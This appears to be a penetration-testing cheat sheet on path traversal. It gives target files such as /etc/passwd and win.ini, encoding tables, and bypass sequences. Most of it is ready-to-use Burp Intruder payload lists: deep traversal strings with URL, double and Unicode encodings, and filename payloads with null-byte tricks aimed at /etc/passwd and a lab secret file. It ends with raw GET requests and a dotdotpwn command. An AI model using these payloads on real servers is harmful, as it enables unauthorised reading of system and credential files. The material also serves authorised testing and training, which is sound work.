# Path Traversal A directory traversal vulnerability can be present inside **a web server,** inside **an application framework** (during the HTTP request pre-processing and routing), or within **an application endpoint** that processes data according to application logic (for example, reading a file from storage based on its name). ## Platform - Filename and Path You need to figure out a platform in order to know how to address specific files. For Linux, a good file to read is`/etc/passw`which is readable every time. On Windows, you can choose `C:\Windows\win.ini` ## Simple ``` ../../../etc/passwd ``` ## URL encoding ``` . = %2e / = %2f \ = %5c ``` ## Double URL encoding ``` . = %252e / = %252f \ = %255c ``` ## UTF-8 bit Unicode ``` . = %c0%2e, %e0%40%ae, %c0ae / = %c0%af, %e0%80%af, %c0%2f \ = %c0%5c, %c0%80%5c ``` ## 16 bit Unicode ``` . = %u002e / = %u2215 \ = %u2216 ``` ## Bypass Path Sequence ``` ../ .../ ..../ ..\ ..\/ ..;/ ..././ ...\.\ %2e%2e%2f %252e%252e%252f %c0%ae%c0%ae%c0%af %uff0e%uff0e%u2215 %uff0e%uff0e%u2216 ``` ### Intruder ![](https://1354665097-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MYLPTPmXutfLTHzDEhx%2Fuploads%2FWzGT8dM3f1kqi7gL6RPV%2Fimage.png?alt=media\&token=82bc9700-5dc8-4f17-9010-44d7d9c4489c) Don't forget to disable URL encoding for the both next Payloads (payload1,payload2) ![](https://1354665097-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MYLPTPmXutfLTHzDEhx%2Fuploads%2FXa1zIqJokGIOqk1Ze76V%2Fimage.png?alt=media\&token=032d0726-b33b-4732-b9f9-98f882075454) ### Payload 1 - Traversal directory sequence, deep 6 ``` ../ ../../ ../../../ ../../../../ ../../../../../ ../../../../../../ .../ .../.../ .../.../.../ .../.../.../.../ .../.../.../.../.../ .../.../.../.../.../.../ ...// ...//...// ...//...//...// ...//...//...//...// ...//...//...//...//...// ...//...//...//...//...//...// ....//....// ....//....//....// ....//....//....//....// ....//....//....//....//....// ....//....//....//....//....//....// ..\ ..\..\ ..\..\..\ ..\..\..\..\ ..\..\..\..\..\ ..\..\..\..\..\..\ ...\ ...\...\ ...\...\...\ ...\...\...\...\ ...\...\...\...\...\ ...\...\...\...\...\...\ ....\\....\\ ....\\....\\....\\ ....\\....\\....\\....\\ ....\\....\\....\\....\\....\\ ....\\....\\....\\....\\....\\....\\ ....\/ ....\/....\/ ....\/....\/....\/ ....\/....\/....\/....\/ ....\/....\/....\/....\/....\/ ....\/....\/....\/....\/....\/....\/ ..\/ ..\/..\/ ..\/..\/..\/ ..\/..\/..\/..\/ ..\/..\/..\/..\/..\/ ..\/..\/..\/..\/..\/..\/ ..;/ ..;/..;/ ..;/..;/..;/ ..;/..;/..;/..;/ ..;/..;/..;/..;/..;/ ..;/..;/..;/..;/..;/..;/ ..././ ..././..././ ..././..././..././ ..././..././..././..././ ..././..././..././..././..././ ..././..././..././..././..././..././ ...\.\ ...\.\...\.\ ...\.\...\.\...\.\ ...\.\...\.\...\.\...\.\ ...\.\...\.\...\.\...\.\...\.\ ...\.\...\.\...\.\...\.\...\.\...\.\ %2e%2e%2f %2e%2e%2f%2e%2e%2f %2e%2e%2f%2e%2e%2f%2e%2e%2f %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f %252e%252e%252f %252e%252e%252f%252e%252e%252f %252e%252e%252f%252e%252e%252f%252e%252e%252f %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f ..%c0%af ..%c0%af..%c0%af ..%c0%af..%c0%af..%c0%af ..%c0%af..%c0%af..%c0%af..%c0%af ..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af ..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af ..%ef%bc%8f ..%ef%bc%8f..%ef%bc%8f ..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f ..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f ..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f ..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f %c0%ae%c0%ae%c0%af %c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af %c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af %c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af %c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af %c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af %uff0e%uff0e%u2215 %uff0e%uff0e%u2215%uff0e%uff0e%u2215 %uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215 %uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215 %uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215 %uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215 %uff0e%uff0e%u2216 %uff0e%uff0e%u2216%uff0e%uff0e%u2216 %uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216 %uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216 %uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216 %uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216 ``` ### Payload 2 - Filename ``` etc/passwd etc/passwd%00 etc/passwd%00.jpg etc/passwd%00.png etc//passwd etc\passwd etc\\passwd etc%2fpasswd etc%252fpasswd etc%c0%afpasswd etc%c0%af%e0%80%afpasswd etc%c0%2fpasswd etc%c0%5cpasswd etc%c0%80%5cpasswd etc%u2215passwd etc%u2216passwd home/carlos/secret home/carlos/secret%00 home/carlos/secret%00.jpg home/carlos/secret%00.png home//carlos//secret home\carlos\secret home\\carlos\\secret home%2fcarlos%2fsecret home%252fcarlos%252fsecret home%c0%afcarlos%c0%afsecret home%c0%af%e0%80%afcarlos%c0%af%e0%80%afsecret home%c0%2fcarlos%c0%2fsecret home%c0%5ccarlos%c0%5csecret home%c0%80%5ccarlos%c0%80%5csecret home%u2215carlos%u2215secret home%u2216carlos%u2216secret ``` ## Web Server Path Traversal Attacks ``` GET C:/Windows/win.ini GET /C:/Windows/win.ini GET file:///Windows/win.ini GET /~/Windows/win.ini ``` ## Tools ### DotDotPwn ``` dotdotpwn -m http-url -u https://example.com/TRAVERSAL -f /etc/passwd -k root ``` ## References \ [
](https://www.kali.org/tools/dotdotpwn/)